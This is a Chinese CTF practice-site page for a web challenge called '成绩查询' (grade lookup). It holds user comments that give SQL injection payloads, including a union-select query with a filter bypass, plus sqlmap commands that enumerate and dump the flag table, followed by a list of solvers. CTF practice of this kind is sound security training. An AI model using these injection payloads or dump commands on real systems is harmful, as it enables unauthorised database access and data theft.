成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 11039
提  示:
描  述:
来源山科大ctf
评论
yemur 3年前

id=-1' union select 1,2,3,skctf_flag from fl4g#

回复 0

lysandria 3年前

过滤了一些东西,空格用%0b绕过。payload:id=-1' union%0bselect%0bgroup_concat(skctf_flag),2,3,4%0bfrom fl4g#

回复 0

15338641414 3年前

输入框的sql注入

回复 0

Hey0iopklh 3年前

'闭合,union注入

回复 0

落叶满阶红 3年前

这题啊,,学了sqlmap使用方法。。自动干进去了,python2 sqlmap.py -u “URL地址” --data=”id=1” --current-db查询当前使用数据库,-D skctf(库名) --tables 查下面所有表,-T fl4g(表名)--columns列出所有的字段名,-C skctf_flag --dump列出字段内容,找到flag

回复 9

02 3年前

有的方法flag根本出不来

回复 0

w1707154109 3年前

超级简单的sql

回复 0

放鹤 3年前

为什么提交的flag不对

回复 0
MONSTEinCAT 3年前

要提交两次才行

回复 0

夜雨 3年前

简单的sql注入

回复 2

Kkkkkirs 3年前

为什么打开环境是 [什么也没有。]啊

回复 0

WriteUp

image
harry

2 金币

评分(22)

解题动态

17690101466 攻破了该题 16小时前
15939373373 攻破了该题 18小时前
zhangzhengyao 攻破了该题 19小时前
你好世界0001 攻破了该题 21小时前
所以flag在哪? 攻破了该题 22小时前
demonsong 攻破了该题 1天前
tomato_cat 攻破了该题 1天前
369563323 攻破了该题 1天前
gondluck 攻破了该题 1天前
邪恶的番茄 攻破了该题 2天前
Fengyu3321 攻破了该题 2天前
Z-M-S 攻破了该题 2天前
benx4899 攻破了该题 2天前
Yuyukon 攻破了该题 2天前
liang123456 攻破了该题 2天前
南京交通第一深情徐立超 攻破了该题 2天前
2360657787 攻破了该题 3天前
igrazee 攻破了该题 3天前
xiaodd 攻破了该题 3天前
wei8007 攻破了该题 3天前
问题反馈